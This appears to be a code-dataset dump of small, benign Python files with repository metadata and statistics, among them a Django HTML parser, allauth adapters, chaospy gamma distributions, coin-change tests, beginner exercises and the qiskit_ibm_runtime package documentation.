0
0
0
0
0
0
0
0
0
0
3
6fc004c212f2783d2231fc887142507710b49687
42
py
Python
pipguitool/__init__.py
sam-sultan/pipuitool
f8ca67c30d7febdafa1db09de68a955fe3401c29
[ "MIT" ]
null
null
null
pipguitool/__init__.py
sam-sultan/pipuitool
f8ca67c30d7febdafa1db09de68a955fe3401c29
[ "MIT" ]
null
null
null
pipguitool/__init__.py
sam-sultan/pipuitool
f8ca67c30d7febdafa1db09de68a955fe3401c29
[ "MIT" ]
null
null
null
from . import PIP __all__ = [ 'PIP' ]
8.4
17
0.547619
5
42
3.8
0.8
0
0
0
0
0
0
0
0
0
0
0
0.309524
42
5
18
8.4
0.655172
0
0
0
0
0
0.069767
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6fdbb0e14f41da5433b21bdaed33458185527bcc
1,632
py
Python
compressor/parser/lxml.py
cron-ooo/django-compressor
f423ae5ab3c019364bfffb4fc26b3b4a5b5bd32b
[ "Apache-2.0" ]
1,480
2015-01-01T17:48:14.000Z
2022-03-31T14:58:45.000Z
compressor/parser/lxml.py
cron-ooo/django-compressor
f423ae5ab3c019364bfffb4fc26b3b4a5b5bd32b
[ "Apache-2.0" ]
571
2015-01-13T13:03:03.000Z
2022-03-22T09:18:12.000Z
compressor/parser/lxml.py
cron-ooo/django-compressor
f423ae5ab3c019364bfffb4fc26b3b4a5b5bd32b
[ "Apache-2.0" ]
356
2015-01-06T12:00:26.000Z
2022-03-02T17:28:25.000Z
from django.core.exceptions import ImproperlyConfigured from django.utils.encoding import smart_str from django.utils.functional import cached_property from compressor.exceptions import ParserError from compressor.parser import ParserBase class LxmlParser(ParserBase): """ LxmlParser will use `lxml.html` parser to parse rendered contents of {% compress %} tag. """ def __init__(self, content): try: from lxml.html import fromstring from lxml.etree import tostring except ImportError as err: raise ImproperlyConfigured("Error while importing lxml: %s" % err) except Exception as err: raise ParserError("Error while initializing parser: %s" % err) self.fromstring = fromstring self.tostring = tostring super().__init__(content) @cached_property def tree(self): """ Document tree. """ content = '<root>%s</root>' % self.content tree = self.fromstring(content) self.tostring(tree, encoding=str) return tree def css_elems(self): return self.tree.xpath('//link[re:test(@rel, "^stylesheet$", "i")]|style', namespaces={"re": "http://exslt.org/regular-expressions"}) def js_elems(self): return self.tree.findall('script') def elem_attribs(self, elem): return elem.attrib def elem_content(self, elem): return smart_str(elem.text) def elem_name(self, elem): return elem.tag def elem_str(self, elem): return smart_str(self.tostring(elem, method='html', encoding=str))
29.672727
82
0.645221
190
1,632
5.442105
0.415789
0.027079
0.054159
0.03675
0.087041
0
0
0
0
0
0
0
0.250613
1,632
54
83
30.222222
0.845462
0.063113
0
0
0
0
0.118439
0
0
0
0
0
0
1
0.222222
false
0
0.25
0.166667
0.694444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
b51032250cadf3d8672572214b5e9f335bd4da40
190
py
Python
exercicios python/ex015.py
fabiano-filho/python
dafe83d4faf7aba304bdaf4d32ac7a176fa53153
[ "MIT" ]
null
null
null
exercicios python/ex015.py
fabiano-filho/python
dafe83d4faf7aba304bdaf4d32ac7a176fa53153
[ "MIT" ]
null
null
null
exercicios python/ex015.py
fabiano-filho/python
dafe83d4faf7aba304bdaf4d32ac7a176fa53153
[ "MIT" ]
null
null
null
km = float(input('Quantidade de Km rodados: ')) dias = float(input('Quantidade de dias: ')) q = km * 0.15 d = dias * 60 print('Você pagará R${:.2f} pelo aluguel do veículo.'.format(q + d))
27.142857
68
0.642105
32
190
3.8125
0.6875
0.163934
0.327869
0.360656
0
0
0
0
0
0
0
0.038217
0.173684
190
6
69
31.666667
0.738854
0
0
0
0
0
0.481481
0
0
0
0
0
0
1
0
false
0
0
0
0
0.2
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
b510bd7655df21add7130bdb4ce91f9fe1697b5b
241
py
Python
src/M4_default_arguments.py
posguy99/comp660-fall2020
0fbf5b660fe8863bf9754b5227fe47dd03dc2291
[ "MIT" ]
null
null
null
src/M4_default_arguments.py
posguy99/comp660-fall2020
0fbf5b660fe8863bf9754b5227fe47dd03dc2291
[ "MIT" ]
null
null
null
src/M4_default_arguments.py
posguy99/comp660-fall2020
0fbf5b660fe8863bf9754b5227fe47dd03dc2291
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # default arguments, assume a default value if one is not provided def display_info(name, age='42'): print('Name: ', name, 'Age', age) display_info(age='56', name='Marc Wilson') display_info(name='Marc Wilson')
24.1
66
0.701245
38
241
4.368421
0.631579
0.198795
0.180723
0
0
0
0
0
0
0
0
0.024155
0.141079
241
9
67
26.777778
0.777778
0.356846
0
0
0
0
0.228758
0
0
0
0
0
0
1
0.25
false
0
0
0
0.25
0.25
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
d21830d3cea7b8f0d13148101cbe7389164a817f
298
py
Python
models/web_page_css_select.py
koba-masa/my_scraping_tool
f5d4665722835189f6e5fb8b1df449f3a123a833
[ "MIT" ]
null
null
null
models/web_page_css_select.py
koba-masa/my_scraping_tool
f5d4665722835189f6e5fb8b1df449f3a123a833
[ "MIT" ]
2
2021-06-25T10:50:17.000Z
2021-08-07T13:00:26.000Z
models/web_page_css_select.py
koba-masa/my_scraping_tool
f5d4665722835189f6e5fb8b1df449f3a123a833
[ "MIT" ]
null
null
null
class WebPageCssSelect: def __init__(self, url, ua_type, selector_name, value): self.url = url self.ua_type = ua_type self.selector_name = selector_name self.value = value def output(self): return self.url + ',' + self.ua_type + ',' + self.selector_name + ',' + self.value
29.8
86
0.667785
41
298
4.560976
0.317073
0.128342
0.096257
0.139037
0.235294
0
0
0
0
0
0
0
0.204698
298
9
87
33.111111
0.78903
0
0
0
0
0
0.010067
0
0
0
0
0
0
1
0.25
false
0
0
0.125
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
3
d2230b8dc70a64a31f97439b6938638e33413ec4
414
py
Python
system/admin.py
XMLPro/ManegementSystem
037d775101ea701f48ef3ad570af7d9f0c983831
[ "MIT" ]
1
2016-06-07T15:12:43.000Z
2016-06-07T15:12:43.000Z
system/admin.py
XMLPro/ManegementSystem
037d775101ea701f48ef3ad570af7d9f0c983831
[ "MIT" ]
71
2016-02-09T09:49:33.000Z
2016-09-04T17:37:05.000Z
system/admin.py
XMLPro/ManegementSystem
037d775101ea701f48ef3ad570af7d9f0c983831
[ "MIT" ]
null
null
null
from django.contrib import admin from .models import CustomUser, Equipment, Search, TagManagement from .models import Reserved, Request, Vote, Log, Tag admin.site.register(CustomUser) admin.site.register(Equipment) admin.site.register(Search) admin.site.register(Reserved) admin.site.register(Request) admin.site.register(Vote) admin.site.register(Log) admin.site.register(TagManagement) admin.site.register(Tag)
29.571429
64
0.818841
56
414
6.053571
0.303571
0.238938
0.451327
0
0
0
0
0
0
0
0
0
0.070048
414
13
65
31.846154
0.880519
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.25
0
0.25
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
d22b01be86bac13ebfe2589a8209e5b7006474c3
641
py
Python
skeptic/functions/error.py
George3d6/skeptic
84fb8907ae70ed6505d4c6a82b1b42cc51f84cbc
[ "BSD-2-Clause" ]
null
null
null
skeptic/functions/error.py
George3d6/skeptic
84fb8907ae70ed6505d4c6a82b1b42cc51f84cbc
[ "BSD-2-Clause" ]
null
null
null
skeptic/functions/error.py
George3d6/skeptic
84fb8907ae70ed6505d4c6a82b1b42cc51f84cbc
[ "BSD-2-Clause" ]
null
null
null
import numpy as np from sklearn.metrics import balanced_accuracy_score def ma_pct_acc(Y, Yh): ''' Implementation of mean absloute percentage accuracy as the inverse of the error defined here: https://en.wikipedia.org/wiki/Mean_absolute_percentage_error ''' Y = np.array(Y) Yh = np.array(Yh) return 1 - np.mean(np.abs(Y-Yh)/Y) def balanced_acc(Y, Yh): ''' Implementation of accuracy as defined here: https://scikit-learn.org/stable/modules/model_evaluation.html#balanced-accuracy-score @TODO: Custom impl so that sklearn isn't a dependency ''' return balanced_accuracy_score(Y, Yh)
32.05
162
0.708268
96
641
4.614583
0.541667
0.03386
0.142212
0.090293
0.099323
0
0
0
0
0
0
0.001927
0.190328
641
19
163
33.736842
0.851638
0.527301
0
0
0
0
0
0
0
0
0
0.052632
0
1
0.25
false
0
0.25
0
0.75
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
1
0
0
0
0
1
0
0
3
d23ab6c93ad8d73ad9b339e81a48eae264b42cc6
185
py
Python
snippets/popular_libraries/plum-bum/intro.py
melvio/python3-examples
5340fe17e0a5001a81cf195e63f825b77dc16fca
[ "Apache-2.0" ]
null
null
null
snippets/popular_libraries/plum-bum/intro.py
melvio/python3-examples
5340fe17e0a5001a81cf195e63f825b77dc16fca
[ "Apache-2.0" ]
null
null
null
snippets/popular_libraries/plum-bum/intro.py
melvio/python3-examples
5340fe17e0a5001a81cf195e63f825b77dc16fca
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 from plumbum.cmd import echo pseudo_json = {'hi': 'there'} cmd = echo[pseudo_json] # /usr/bin/echo {'hi': 'there'} print(cmd) print(cmd()) # {'hi': 'there'}
18.5
56
0.627027
28
185
4.071429
0.5
0.184211
0.245614
0
0
0
0
0
0
0
0
0.006329
0.145946
185
9
57
20.555556
0.71519
0.362162
0
0
0
0
0.06087
0
0
0
0
0
0
1
0
false
0
0.2
0
0.2
0.4
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
d254b8cb518c3ea7f65e2e35fd93f7d6e4521bd7
1,216
py
Python
exercises/0322-CoinChange/coin_change_test.py
tqa236/leetcode-solutions
556147981c43509a6e8a7f59f138d1ab027ebfd1
[ "MIT" ]
1
2020-09-26T15:09:25.000Z
2020-09-26T15:09:25.000Z
exercises/0322-CoinChange/coin_change_test.py
tqa236/leetcode-solutions
556147981c43509a6e8a7f59f138d1ab027ebfd1
[ "MIT" ]
null
null
null
exercises/0322-CoinChange/coin_change_test.py
tqa236/leetcode-solutions
556147981c43509a6e8a7f59f138d1ab027ebfd1
[ "MIT" ]
null
null
null
import unittest import hypothesis.strategies as st from hypothesis import given from coin_change import Solution class Test(unittest.TestCase): def test_1(self): solution = Solution() self.assertEqual(solution.coinChange([1, 2, 5], 11), 3) def test_2(self): solution = Solution() self.assertEqual(solution.coinChange([2], 3), -1) def test_3(self): solution = Solution() self.assertEqual(solution.coinChange([1], 0), 0) def test_4(self): solution = Solution() self.assertEqual(solution.coinChange([1], 1), 1) def test_5(self): solution = Solution() self.assertEqual(solution.coinChange([1], 2), 2) def test_6(self): solution = Solution() self.assertEqual(solution.coinChange([1, 2, 4, 8, 10], 10002), 1001) # def test_7(self): # solution = Solution() # self.assertEqual(solution.coinChange([186, 419, 83, 408], 6249), 20) # @given(st.lists(st.integers(), min_size=1), st.lists(st.integers())) # def test_random(self, x, y): # solution = Solution() # self.assertEqual(solution.coinChange(), True) if __name__ == "__main__": unittest.main()
28.27907
78
0.623355
150
1,216
4.933333
0.32
0.075676
0.216216
0.335135
0.578378
0.578378
0.512162
0.368919
0.222973
0
0
0.062165
0.23273
1,216
43
79
28.27907
0.730975
0.238487
0
0.24
0
0
0.008705
0
0
0
0
0
0.24
1
0.24
false
0
0.16
0
0.44
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
d26316516fb12bfdb184b219ee197585d646ba8c
1,237
py
Python
locuszoom_plotting_service/users/adapters.py
statgen/locuszoom-hosted
ecfcc5f48fefe2869ab277202a661c2575af6abb
[ "MIT" ]
null
null
null
locuszoom_plotting_service/users/adapters.py
statgen/locuszoom-hosted
ecfcc5f48fefe2869ab277202a661c2575af6abb
[ "MIT" ]
14
2021-01-01T17:16:23.000Z
2022-02-28T19:37:28.000Z
locuszoom_plotting_service/users/adapters.py
statgen/locuszoom-hosted
ecfcc5f48fefe2869ab277202a661c2575af6abb
[ "MIT" ]
null
null
null
from typing import Any from allauth.account.adapter import DefaultAccountAdapter from allauth.socialaccount.adapter import DefaultSocialAccountAdapter from django.conf import settings from django.core.exceptions import ValidationError from django.http import HttpRequest class AccountAdapter(DefaultAccountAdapter): """Disable locally-managed accounts; only OAuth allowed. (even for development)""" def is_open_for_signup(self, request: HttpRequest): return False class SocialAccountAdapter(DefaultSocialAccountAdapter): """Note: a google quirk doesn't allow IPs in oauth url (even eg 0.0.0.0); use localhost instead""" def is_open_for_signup(self, request: HttpRequest, sociallogin: Any): return getattr(settings, "ACCOUNT_ALLOW_REGISTRATION", True) def validate_disconnect(self, account, accounts): """ Social accounts are the only login scheme allowed for this app; removing all from this user would therefore leave their account broken (with no way to log in) """ if len(accounts) == 1: raise ValidationError('You must have at least one account connected') super(SocialAccountAdapter, self).validate_disconnect(account, accounts)
41.233333
115
0.750202
150
1,237
6.12
0.613333
0.03268
0.019608
0.026144
0.087146
0.087146
0.087146
0.087146
0
0
0
0.004926
0.179466
1,237
29
116
42.655172
0.899507
0.265158
0
0
0
0
0.080738
0.029988
0
0
0
0
0
1
0.1875
false
0
0.375
0.125
0.8125
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
1
1
0
0
3
d273970ede0f3facde5d9e95372f491327255f07
475
py
Python
_note_/_shutil_.py
By2048/_python_
be57738093676a1273e6f69232723669e408986e
[ "MIT" ]
2
2017-02-16T14:50:33.000Z
2018-02-03T01:49:06.000Z
_note_/_shutil_.py
By2048/_python_
be57738093676a1273e6f69232723669e408986e
[ "MIT" ]
null
null
null
_note_/_shutil_.py
By2048/_python_
be57738093676a1273e6f69232723669e408986e
[ "MIT" ]
null
null
null
import shutil shutil.get_archive_formats() shutil.make_archive('/tmp/f1', 'zip', root_dir='/tmp/f1/') shutil.move('/tmp/f1', '/tmp/f2') shutil.copytree('/tmp/f1/', '/tmp/f2/') shutil.copytree('/tmp/f1/', '/tmp/f2/', ignore=shutil.ignore_patterns('*.pyc', 'tmp*')) shutil.rmtree('/tmp/f1/') shutil.copy('/tmp/f1', '/tmp/f2') shutil.copyfile('/tmp/f1', '/tmp/f2') shutil.copymode('/tmp/f1', '/tmp/f2') shutil.copystat('/tmp/f1', '/tmp/f2') shutil.copy2('/tmp/f1', '/tmp/f2')
31.666667
87
0.646316
74
475
4.081081
0.310811
0.182119
0.211921
0.264901
0.403974
0.192053
0.192053
0.192053
0.192053
0.192053
0
0.044643
0.056842
475
14
88
33.928571
0.629464
0
0
0
0
0
0.317895
0
0
0
0
0
0
1
0
true
0
0.083333
0
0.083333
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
96286ded532822bc79aa8f182ed0a84cf13dad46
3,343
py
Python
chaospy/distributions/collection/gamma.py
utsekaj42/chaospy
0fb23cbb58eb987c3ca912e2a20b83ebab0514d0
[ "MIT" ]
333
2016-10-25T12:00:48.000Z
2022-03-30T07:50:33.000Z
chaospy/distributions/collection/gamma.py
utsekaj42/chaospy
0fb23cbb58eb987c3ca912e2a20b83ebab0514d0
[ "MIT" ]
327
2016-09-25T16:29:41.000Z
2022-03-30T03:26:27.000Z
chaospy/distributions/collection/gamma.py
utsekaj42/chaospy
0fb23cbb58eb987c3ca912e2a20b83ebab0514d0
[ "MIT" ]
74
2016-10-17T11:14:13.000Z
2021-12-09T10:55:59.000Z
"""Gamma distribution.""" import numpy from scipy import special from ..baseclass import SimpleDistribution, ShiftScaleDistribution class gamma(SimpleDistribution): def __init__(self, a=1): super(gamma, self).__init__(dict(a=a)) def _pdf(self, x, a): return x**(a-1)*numpy.e**(-x)/special.gamma(a) def _cdf(self, x, a): return special.gammainc(a, x) def _ppf(self, q, a): return special.gammaincinv(a, q) def _mom(self, k, a): return special.gamma(a+k)/special.gamma(a) def _ttr(self, n, a): return 2.*n+a, n*n+n*(a-1) def _lower(self, a): return 0. def _upper(self, a): return special.gammaincinv(a, 1-1e-14) class Gamma(ShiftScaleDistribution): """ Gamma distribution. Also an Erlang distribution when shape=k and scale=1./lamb. Args: shape (float, Distribution): Shape parameter. a>0. scale (float, Distribution): Scale parameter. scale!=0 shift (float, Distribution): Location of the lower bound. Examples: >>> distribution = chaospy.Gamma(3, scale=0.5) >>> distribution Gamma(3, scale=0.5) >>> uloc = numpy.linspace(0, 1, 6) >>> uloc array([0. , 0.2, 0.4, 0.6, 0.8, 1. ]) >>> xloc = distribution.inv(uloc) >>> xloc.round(3) array([ 0. , 0.768, 1.143, 1.553, 2.14 , 19.459]) >>> numpy.allclose(distribution.fwd(xloc), uloc) True >>> distribution.pdf(xloc).round(3) array([0. , 0.508, 0.531, 0.432, 0.254, 0. ]) >>> distribution.sample(4).round(3) array([1.683, 0.587, 3.152, 1.301]) >>> distribution.mom(1).round(3) 1.5 >>> distribution.ttr([0, 1, 2, 3]).round(3) array([[1.5 , 2.5 , 3.5 , 4.5 ], [0. , 0.75, 2. , 3.75]]) """ def __init__(self, shape=1, scale=1, shift=0): super(Gamma, self).__init__( dist=gamma(shape), scale=scale, shift=shift, repr_args=[shape], ) class Exponential(ShiftScaleDistribution): R""" Exponential Probability Distribution Args: scale (float, Distribution): Scale parameter. scale!=0 shift (float, Distribution): Location of the lower bound. 
Examples;: >>> distribution = chaospy.Exponential() >>> distribution Exponential() >>> uloc = numpy.linspace(0, 1, 6) >>> uloc array([0. , 0.2, 0.4, 0.6, 0.8, 1. ]) >>> xloc = distribution.inv(uloc) >>> xloc.round(3) array([ 0. , 0.223, 0.511, 0.916, 1.609, 32.237]) >>> numpy.allclose(distribution.fwd(xloc), uloc) True >>> distribution.pdf(xloc).round(3) array([1. , 0.8, 0.6, 0.4, 0.2, 0. ]) >>> distribution.sample(4).round(3) array([1.06 , 0.122, 3.001, 0.658]) >>> distribution.mom(1).round(3) 1.0 >>> distribution.ttr([1, 2, 3]).round(3) array([[3., 5., 7.], [1., 4., 9.]]) """ def __init__(self, scale=1, shift=0): super(Exponential, self).__init__( dist=gamma(1), scale=scale, shift=shift, repr_args=[], )
27.178862
66
0.518696
431
3,343
3.946636
0.234339
0.035273
0.051734
0.035273
0.4903
0.424456
0.346855
0.346855
0.30923
0.30923
0
0.08726
0.314388
3,343
122
67
27.401639
0.654887
0.564762
0
0.108108
0
0
0
0
0
0
0
0
0
1
0.27027
false
0
0.081081
0.189189
0.621622
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
962f76c92089823307d591039b72f7cd22f55f08
1,189
py
Python
webtool/server/admin.py
wodo/WebTool3
1582a03d619434d8a6139f705a1b5860e9b5b8b8
[ "BSD-2-Clause" ]
13
2018-12-16T21:01:24.000Z
2019-07-03T06:23:41.000Z
webtool/server/admin.py
dav-kempten/WebTool3
859f39df67cb0f853c7fe33cb5d08b999d8692fc
[ "BSD-2-Clause" ]
26
2019-07-07T06:44:06.000Z
2021-09-07T07:28:34.000Z
webtool/server/admin.py
dav-kempten/WebTool3
859f39df67cb0f853c7fe33cb5d08b999d8692fc
[ "BSD-2-Clause" ]
3
2017-06-18T06:22:52.000Z
2019-07-03T06:21:05.000Z
from django.contrib import admin from django.contrib.auth.admin import User from server.models.collective import Collective, Session from server.models.qualification import Qualification, QualificationGroup from server.models.instruction import Instruction, Topic from server.models.category import Category, CategoryGroup from server.models.tour import Tour from server.models.equipment import Equipment from server.models.calendar import Calendar, Anniversary, Vacation from server.user_admin import UserAdmin from server.event_admin import InstructionAdmin, TourAdmin # Register your models here. # Auth.User admin.site.unregister(User) admin.site.register(User, UserAdmin) # Calendar admin.site.register(Calendar) admin.site.register(Anniversary) admin.site.register(Vacation) # Collective admin.site.register(Collective) admin.site.register(Session) # Qualifications admin.site.register(Qualification) admin.site.register(QualificationGroup) # Mixins admin.site.register(Category) admin.site.register(CategoryGroup) admin.site.register(Tour, TourAdmin) admin.site.register(Equipment) # Instructions admin.site.register(Instruction, InstructionAdmin) admin.site.register(Topic)
29
73
0.83852
147
1,189
6.768707
0.231293
0.135678
0.239196
0.050251
0
0
0
0
0
0
0
0
0.078217
1,189
40
74
29.725
0.907847
0.076535
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.423077
0
0.423077
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
3
964492a4d0eaf338ab8240263eedee2a98a048db
9,387
py
Python
qiskit_ibm_runtime/__init__.py
rathishcholarajan/qiskit-ibm-runtime
315a088a844dc8aa4452bde6136b53694dfb3220
[ "Apache-2.0" ]
null
null
null
qiskit_ibm_runtime/__init__.py
rathishcholarajan/qiskit-ibm-runtime
315a088a844dc8aa4452bde6136b53694dfb3220
[ "Apache-2.0" ]
null
null
null
qiskit_ibm_runtime/__init__.py
rathishcholarajan/qiskit-ibm-runtime
315a088a844dc8aa4452bde6136b53694dfb3220
[ "Apache-2.0" ]
null
null
null
# This code is part of Qiskit. # # (C) Copyright IBM 2022. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ ========================================== Qiskit Runtime (:mod:`qiskit_ibm_runtime`) ========================================== .. currentmodule:: qiskit_ibm_runtime Modules related to Qiskit Runtime IBM Client. Qiskit Runtime is a new architecture that streamlines computations requiring many iterations. These experiments will execute significantly faster within its improved hybrid quantum/classical process. Qiskit Runtime IBM Client allows authorized users to upload their Qiskit quantum programs. A Qiskit quantum program, also called a runtime program, is a piece of Python code and its metadata that takes certain inputs, performs quantum and maybe classical processing, and returns the results. The same or other authorized users can invoke these quantum programs by simply passing in parameters. Account initialization ---------------------- You need to initialize your account before you can start using the Qiskit Runtime service. This is done by initializing an :class:`QiskitRuntimeService` instance with your account credentials. If you don't want to pass in the credentials each time, you can use the :meth:`QiskitRuntimeService.save_account` method to save the credentials on disk. Qiskit Runtime is available on both IBM Cloud and IBM Quantum, and you can specify ``channel="ibm_cloud"`` for IBM Cloud and ``channel="ibm_quantum"`` for IBM Quantum. The default is IBM Cloud. 
Listing runtime programs ------------------------ To list all available runtime programs:: from qiskit_ibm_runtime import QiskitRuntimeService service = QiskitRuntimeService() # List all available programs. service.pprint_programs() # Get a single program. program = service.program('sampler') # Print program metadata. print(program) The example above prints the program metadata of all available runtime programs and of just the ``sampler`` program. A program metadata consists of the program's ID, name, description, input parameters, return values, interim results, and other information that helps you to know more about the program. Invoking a runtime program -------------------------- You can use the :meth:`QiskitRuntimeService.run` method to invoke a runtime program. For example:: from qiskit import QuantumCircuit from qiskit_ibm_runtime import QiskitRuntimeService service = QiskitRuntimeService() backend = "ibmq_qasm_simulator" # Create a circuit. qc = QuantumCircuit(2, 2) qc.h(0) qc.cx(0, 1) qc.measure_all() # Set the "sampler" program parameters params = service.program(program_id="sampler").parameters() params.circuits = qc # Configure backend options options = {'backend_name': backend} # Execute the circuit using the "sampler" program. job = service.run(program_id="sampler", options=options, inputs=params) # Get runtime job result. result = job.result() The example above invokes the ``sampler`` program. Runtime Jobs ------------ When you use the :meth:`QiskitRuntimeService.run` method to invoke a runtime program, a :class:`RuntimeJob` instance is returned. This class has all the basic job methods, such as :meth:`RuntimeJob.status`, :meth:`RuntimeJob.result`, and :meth:`RuntimeJob.cancel`. Interim and final results ------------------------- Some runtime programs provide interim results that inform you about program progress. 
You can choose to stream the interim results and final result when you run the program by passing in the ``callback`` parameter, or at a later time using the :meth:`RuntimeJob.stream_results` method. For example:: from qiskit import QuantumCircuit from qiskit_ibm_runtime import QiskitRuntimeService service = QiskitRuntimeService() backend = "ibmq_qasm_simulator" def result_callback(job_id, result): print(result) # Stream results as soon as the job starts running. job = service.run(program_id="sampler", options=options, inputs=program_inputs, callback=result_callback) Backend data ------------ :class:`QiskitRuntimeService` also has methods, such as :meth:`backend`, :meth:`backends`, and :meth:`least_busy`, that allows you to query for a target backend to use. These methods return one or more :class:`IBMBackend` instances that contains methods and attributes describing the backend. Uploading a program ------------------- Each runtime program has both ``data`` and ``metadata``. Program data is the Python code to be executed. Program metadata provides usage information, such as program description, its inputs and outputs, and backend requirements. A detailed program metadata helps the consumers of the program to know what is needed to run the program. Each program data needs to have a ``main(backend, user_messenger, **kwargs)`` method, which serves as the entry point to the program. The ``backend`` parameter is a :class:`ProgramBackend` instance whose :meth:`ProgramBackend.run` method can be used to submit circuits. The ``user_messenger`` is a :class:`UserMessenger` instance whose :meth:`UserMessenger.publish` method can be used to publish interim and final results. See `qiskit_ibm_runtime/program/program_template.py` for a program data template file. Each program metadata must include at least the program name, description, and maximum execution time. You can find description of each metadata field in the :meth:`QiskitRuntimeService.upload_program` method. 
Instead of passing in the metadata fields individually, you can pass in a JSON file or a dictionary to :meth:`QiskitRuntimeService.upload_program` via the ``metadata`` parameter. `qiskit_ibm_runtime/program/program_metadata_sample.json` is a sample file of program metadata. You can use the :meth:`QiskitRuntimeService.upload_program` to upload a program. For example:: from qiskit_ibm_runtime import QiskitRuntimeService service = QiskitRuntimeService() program_id = service.upload_program( data="my_vqe.py", metadata="my_vqe_metadata.json" ) In the example above, the file ``my_vqe.py`` contains the program data, and ``my_vqe_metadata.json`` contains the program metadata. Method :meth:`QiskitRuntimeService.delete_program` allows you to delete a program. Files related to writing a runtime program are in the ``qiskit_ibm_runtime/program`` directory. Logging ------- `qiskit-ibm-runtime` uses the ``qiskit_ibm_runtime`` logger. Two environment variables can be used to control the logging: * ``QISKIT_IBM_RUNTIME_LOG_LEVEL``: Specifies the log level to use. If an invalid level is set, the log level defaults to ``WARNING``. The valid log levels are ``DEBUG``, ``INFO``, ``WARNING``, ``ERROR``, and ``CRITICAL`` (case-insensitive). If the environment variable is not set, then the parent logger's level is used, which also defaults to ``WARNING``. * ``QISKIT_IBM_RUNTIME_LOG_FILE``: Specifies the name of the log file to use. If specified, messages will be logged to the file only. Otherwise messages will be logged to the standard error (usually the screen). For more advanced use, you can modify the logger itself. For example, to manually set the level to ``WARNING``:: import logging logging.getLogger('qiskit_ibm_runtime').setLevel(logging.WARNING) Classes ========================== .. 
autosummary:: :toctree: ../stubs/ QiskitRuntimeService Estimator Sampler IBMBackend RuntimeJob RuntimeProgram ParameterNamespace RuntimeOptions RuntimeEncoder RuntimeDecoder IBMRuntimeService """ import logging from .qiskit_runtime_service import QiskitRuntimeService, IBMRuntimeService from .ibm_backend import IBMBackend from .runtime_job import RuntimeJob from .runtime_program import RuntimeProgram, ParameterNamespace from .runtime_options import RuntimeOptions from .utils.json import RuntimeEncoder, RuntimeDecoder from .exceptions import * from .utils.utils import setup_logger from .version import __version__ from .estimator import Estimator from .sampler import Sampler # TODO remove when terra code is released from .qiskit.primitives import ( BaseEstimator, EstimatorResult, BaseSampler, SamplerResult, ) # Setup the logger for the IBM Quantum Provider package. logger = logging.getLogger(__name__) setup_logger(logger) # Constants used by the IBM Quantum logger. QISKIT_IBM_RUNTIME_LOGGER_NAME = "qiskit_ibm_runtime" """The name of the IBM Quantum logger.""" QISKIT_IBM_RUNTIME_LOG_LEVEL = "QISKIT_IBM_RUNTIME_LOG_LEVEL" """The environment variable name that is used to set the level for the IBM Quantum logger.""" QISKIT_IBM_RUNTIME_LOG_FILE = "QISKIT_IBM_RUNTIME_LOG_FILE" """The environment variable name that is used to set the file for the IBM Quantum logger."""
35.157303
97
0.738468
1,255
9,387
5.440637
0.274104
0.026362
0.046866
0.016696
0.184681
0.141916
0.123169
0.118043
0.08553
0.071178
0
0.001669
0.170235
9,387
266
98
35.289474
0.874952
0.882497
0
0
0
0
0.08528
0.064252
0
0
0
0.003759
0
1
0
false
0
0.565217
0
0.565217
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
964f8b0ef168e01380c77ffdd8150df7996bd18b
425
py
Python
grammar.py
prtx/SLR-Parser-Implementation
d73bb54763219fdc1becf0e4179e1a49517d7242
[ "MIT" ]
null
null
null
grammar.py
prtx/SLR-Parser-Implementation
d73bb54763219fdc1becf0e4179e1a49517d7242
[ "MIT" ]
null
null
null
grammar.py
prtx/SLR-Parser-Implementation
d73bb54763219fdc1becf0e4179e1a49517d7242
[ "MIT" ]
1
2020-06-25T04:03:14.000Z
2020-06-25T04:03:14.000Z
